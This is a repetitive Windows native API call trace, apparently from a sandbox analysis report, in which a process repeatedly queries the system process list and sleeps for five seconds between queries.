0x0 [0129.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.390] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.407] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.421] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.438] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.450] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.454] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.465] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.469] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.486] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.500] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.516] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.532] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.547] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.564] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.578] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.593] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.611] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.626] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.640] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.658] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.672] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.688] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.703] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.720] 